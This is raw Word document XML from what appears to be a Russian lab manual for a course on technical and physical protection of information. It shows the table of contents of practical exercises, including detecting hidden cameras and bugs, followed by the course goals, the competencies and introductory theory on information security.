        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</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12" w:history="1">
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа №4. Методы и средства обеспечения информационной безопасности</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3808612 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</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13" w:history="1">
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа №5. Организация системы защиты информации</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3808613 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</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14" w:history="1">
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа №6. Информационная безопасность отдельных экономических систем</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3808614 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</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15" w:history="1">
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа № 7. Обнаружение и локализация радиоизлучающих технических средств с помощью детектора поля ST 111.</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3808615 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</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16" w:history="1">
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа №8. Поиск и локализация скрытых видеокамер с использованием обнаружителя скрытых видеокамер «Оптик-2».</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3808616 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</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17" w:history="1">
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа №9. Обнаружение скрытых  проводных и беспроводных  видеокамер с помощью оптического обнаружителя видеокамер BugHunter Dvideo.</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3808617 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</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18" w:history="1">
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа №10. Исследование помещений на предмет обнаружения в ближней зоне скрытых радиопередатчиков с помощью индикатора поля Expert BugHunter BH-03</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3808618 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</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19" w:history="1">
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа №11Автономный регистратор сотовых разговоров SpRecord SpGate MR</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3808619 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</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26" w:history="1">
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа №13 Видеоэндоскоп MaxiVideo MV208</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3808626 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>61</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28" w:history="1">
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа №14 Микрофон усиливающий «Супер Ухо SD»</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3808628 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>85</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34" w:history="1">
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа №15 Видеорегистратор LawMate PV-550SE с камерой 618СА</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3808634 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>87</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35" w:history="1">
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическая работа №16 Подавитель диктофонов Бубен-ультра</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3808635 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>89</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="00523CE5" w:rsidRDefault="00523CE5">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9610"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc3808637" w:history="1">
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Список рекомендуемых источников</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3808637 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>97</w:t>
        </w:r>
        <w:r w:rsidRPr="00523CE5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRDefault="00523CE5">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0">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lastRenderedPageBreak/>
        <w:t>Дисциплина «</w:t>
      </w:r>
      <w:r w:rsidR="00C2668F" w:rsidRPr="00C2668F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Инженерно-технические средства физической защиты объектов информатизации</w:t>
      </w:r>
      <w:r w:rsidRPr="00523CE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>» имеет целью теоретическую и практическую подготовку специалистов в области технической защиты информации для обеспечения их эффективного применения с учетом требований информационной безопасности и привитие навыков в использовании методов обеспечения защиты информации.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 xml:space="preserve">Целью дисциплины «Техническая защита информации» является изучение технических средств и методов защиты информации в информационных системах. </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Задачами дисциплины являются формирование:</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 xml:space="preserve">-знаний о физических процессах образования технических каналов утечки конфиденциальной информации, методах и средствах перехвата, об организации и средствах защиты информации и объектах информатизации; </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-умений эффективно применять методы и средства защиты информации, сообразуясь с нормативными документами по противодействию технической разведке и результатами анализа угроз информационной безопасности объекта;</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-навыков владения методами и средствами защиты информации, расчета и инструментального контроля показателей защищенности.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Компетенции обучающегося, формируемые в результате освоения дисциплины</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Процесс изучения дисциплины направлен на формирование следующих компетенций:</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lastRenderedPageBreak/>
        <w:t>ОК 04. Работать в коллективе и команде, эффективно взаимодействовать с коллегами, руководством, клиентами.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09. Использовать информационные технологии в профессиональной деятельности.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10. Пользоваться профессиональной документацией на государственном и иностранном языке.</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ПК 3.1. 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ПК 3.2. Осуществлять эксплуатацию технических средств защиты информации в соответствии с требованиями эксплуатационной документации.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ПК 3.3. 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ПК 3.4. Осуществлять измерение параметров фоновых шумов, а также физических полей, создаваемых техническими средствами защиты информации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="00523CE5" w:rsidRDefault="00523CE5" w:rsidP="00523CE5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="dot" w:pos="9320"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00523CE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ПК 3.5. Организовывать отдельные работы по физической защите объектов информатизации</w:t>
      </w:r>
      <w:r w:rsidRPr="00523CE5">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523CE5" w:rsidRPr="00B45DB0" w:rsidRDefault="00523CE5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="dot" w:pos="9320"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:sectPr w:rsidR="00523CE5" w:rsidRPr="00B45DB0">
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="825" w:right="860" w:bottom="1440" w:left="1420" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="0" w:equalWidth="0">
            <w:col w:w="9620"/>
          </w:cols>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="page5"/>
      <w:bookmarkStart w:id="2" w:name="_Toc3808609"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая работа №</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Теоретические основы информационной безопасности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="302"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Методические указания</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="26" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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Развитие человеческого общества неразрывно связано с процессом информатизации, под которым понимается непрерывно возобновляемый процесс создания необходимых условий для удовлетворения информационных потребностей человека. На протяжении всей истории человеческой цивилизации и даже на начальной стадии возникали потребности, связанные с получением, хранением и накоплением, первичной обработкой и переработкой, поиском, отображением, передачей и обменом информацией.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="3" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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Современный этап информатизации характеризуется созданием информационных систем и систем телекоммуникации с применением средств персональной электронной вычислительной техники.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1051"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>результате накопления мирового практического опыта, знаний и духовных ценностей границы национальных экономик постепенно стираются и формируется информационное общество, которое развивается в соответствующем информационном пространстве.</w:t>
      </w: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Под инфосферой понимается сфера практической деятельности по сбору, созданию, получению, хранению, преобразованию, распространению и использованию информации,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="1" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>неразрывно связанная с информационной инфраструктурой и соответствующими субъектами, а также системами регулирования возникающих при этом общественных отношений.</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Информационная сфера выполняет системообразующую функцию жизни информационного общества, активно влияет на состояние политической, экономической, оборонной и других составляющих безопасности государства, личности и общества. Таким образом, национальная безопасность существенным образом зависит от обеспечения информационной безопасности.</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По мере развития человеческой цивилизации, интеграции национальных экономик, глобализации информационных процессов накапливаются противоречия, которыми неизбежно определяется любое развитие, в виде реальных военных конфликтов, противостояния национальных, личных интересов, которые постепенно переходят и в информационную сферу.</w:t>
      </w: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Под информационной безопасностью понимается состояние защищенности от информационных угроз, сохранение свойств объекта информационной безопасности, которые обусловлены информацией, её потоками и информационной инфраструктурой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="1" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="977"/>
        </w:tabs>
        <w:spacing w:line="250" w:lineRule="auto"/>
        <w:ind w:firstLine="718"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>соответствии с Указом Президента от 9 мая 2017 г. №203 утверждена Стратегия развития информационного общества в Российской Федерации на 2017 - 2030 годы. Для обеспечения информационной безопасности на законодательном уровне разрабатывается механизм, позволяющий согласовать процесс разработки законов и подзаконных нормативных актов и развития современных информационных технологий. Он включает совокупность мер, направленных на создание и поддержание в обществе негативного отношения к нарушениям и нарушителям информационной безопасности путем принятия соответствующих законодательных актов, а также направляющие и координирующие меры (государственный контроль за информационными процессами, система государственной статистической отчетности, разработка и внедрение национальных сертифицированных средств защиты информации, систем электронных платежей, денег и торговли, стандартизация этих систем и разработка нормативной правовой базы, регламентирующей их использование, совершенствование нормативной правовой базы, регулирующей информационные отношения в сфере экономики и т.д.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="4" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="250" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
